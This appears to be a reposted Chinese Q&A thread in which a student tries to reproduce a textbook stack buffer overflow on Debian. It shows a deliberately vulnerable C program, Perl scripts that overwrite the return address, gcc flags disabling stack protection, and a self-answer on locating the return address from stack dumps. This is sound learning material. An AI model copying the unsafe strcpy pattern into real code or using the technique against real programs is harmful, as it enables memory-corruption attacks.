试验缓冲区溢出

贪婪的

我最近参加了一个安全课程,在该课程中我们简要介绍了缓冲区溢出。我对所涵盖的内容不满意,因此我寻找了一些可以跟进的示例,并尝试一下自己,发现缓冲区溢出攻击

我喜欢这个示例,因为它很容易理解和理解一切正常的原因。我尝试遵循,但是使用的是Debian虚拟机而不是Windows。

这是该站点的C代码:

#pragma check_stack(off)

#include <string.h>
#include <stdio.h> 

void foo(const char* input)
{
    char buf[10];

    printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n% p\n\n");

    strcpy(buf, input);
    printf("%s\n", buf);

    printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}

void bar(void)
{
    printf("Augh! I've been hacked!\n");
}

int main(int argc, char* argv[])
{
    //Blatant cheating to make life easier on myself
    printf("Address of foo = %p\n", foo);
    printf("Address of bar = %p\n", bar);

    if (argc != 2) 
    {
        printf("Please supply a string as an argument!\n");
        return -1;
    } 

    foo(argv[1]);
    return 0;
}

通过提供两个函数foo和bar的地址,代码“作弊”。最终目标是仅使用缓冲区溢出来使bar运行。为此,他们给出了一个简短的Perl脚本:

$arg = "ABCDEFGHIJKLMNOP"."\x50\x10\x40";
$cmd = "StackOverrun ".$arg;
system($cmd);

由于我使用的是Linux而不是Windows,并且由于bar函数的地址略有不同,因此我做了几个简单的修复:

$arg = "ABCDEFGHIJKLMNOP"."\xf7\x05\x40";
$cmd = "./prog ".$arg;
system($cmd);

我认为它的工作方式应与他们的示例相同。运行Perl脚本,它将填充文本提供给程序,然后是要运行的新返回地址bar但这对我不起作用。

这是运行我的Perl脚本的输出:

Address of foo: 0x400596
Address of bar: 0x4005f7
The current stack:
0x7fffe6b4abd8
0x7faba670c7a0
0x1d
0x6
0x7faba63b099a
0x7fffe6b4ad00

ABCDEFGHIJKLMNOPP�
Stack after input:
0x7ffc31998568
0x7f9a7c6ed7a0
0x7f9a7c421e50
0xf70550504f4e4d4c
0x7f9a7c39199a
0x7ffc31998690

在我的输出中,唯一包含任何填充文本的地址是最后一个地址的第三个地址,即最后一个地址,紧接在返回地址之前。

我怀疑问题出在使用gcc编译我的程序,但是我不确定到底是什么引起了它。问题也可能是Debian。这是我编译程序的方式:

gcc -z execstack -fno-stack-protector prog.c -o prog

我的希望是,没有堆栈保护程序的编译将使我能够按照示例进行操作,而不会出现问题。

任何帮助都会很棒,我完全被困住了。实际上,我可以简单地切换到Windows,但是在这一点上,我真的很想知道为什么它不起作用以及如何修复它。

贪婪的

好吧,所以我将在这里回答我自己的问题,以防万一将来查看它的人感到好奇。

本质上,问题源于没有打印足够的内存地址来获得堆栈的清晰图像。如果按照问题中的链接进行操作,您会发现仅打印堆栈的6个内存地址即可满足其系统要求,但不足以满足我们的要求。我的朋友建议从此更改源代码:

printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n% p\n\n");

strcpy(buf, input);
printf("%s\n", buf);

printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

对此:

printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

strcpy(buf, input);

printf("Buffer: %s\n", buf);
printf("Address of Buffer: %p\n\n", buf);
printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

这一变化为我们做两件事。首先,它将打印的地址数量增加到13。其次,打印缓冲区开始的地址。第二部分很重要,因为它为我们提供了一个在给定的堆栈地址中寻找的相对值。例子:

overflow@OVERFLOW:~/Overflow$ ./prog ZZZZZZ
Address of foo = 0x400596
Address of bar = 0x400601
Current Stack:
0x7fffffe6
0x7f30b7f8a7a0
0x19
0x6
0x7f30b7c2e99a
0x4007c8
0x7ffddab72653
0x7f30b7f9cde0
0x7f30b81b01a8
0x7ffddab71250
0x400672
0x7ffddab71338
0x200000000

Buffer: ZZZZZZ
Address of Buffer: 0x7ffddab71220

Stack after Input:
0x7fffffde
0x7f30b7f8a7a0
0x21
0xc
0x7f30b7c2e99a
0x4007c8
0x7ffddab72653
0x5a5a5a5a5a5a
0x7f30b81b01a8
0x7ffddab71250
0x400672
0x7ffddab71338
0x200000000

在这个例子中我们可以看到Address of Buffer: 0x7ffddab71220如果我们翻阅下面的堆栈地址,会发现一个非常相似的:0x7ffddab72653我们可以认为这是缓冲区的起点,因此以下几个地址将成为缓冲区的存储容器。实际上,在此示例中,我在缓冲区上打印了“ ZZZZZZ”,您可以看到紧接我们起点之后的地址已更改为0x5a5a5a5a5a5a十六进制的“ ZZZZZZ”,您可能已经猜到了。

太好了,所以现在我们知道缓冲区实际上从哪里开始,但是我们不知道哪个是返回地址。如果我们看一下函数的地址:

Address of foo = 0x400596Address of bar = 0x400601在这种情况下我们可以在缓冲区起始点以下找到类似的值:0x400672

至此,我们知道了所有需要做的事情:哪些内存地址存储了缓冲区,我们要调用的函数的地址以及最重要的是我们要覆盖的返回地址。到那时,您可以尝试一下perl脚本,在缓冲区中添加字符,直到获得所需的结果为止。

本文收集自互联网,转载请注明来源。

如有侵权,请联系[email protected] 删除。

编辑于
0

我来说两句

0条评论
登录后参与评论

相关文章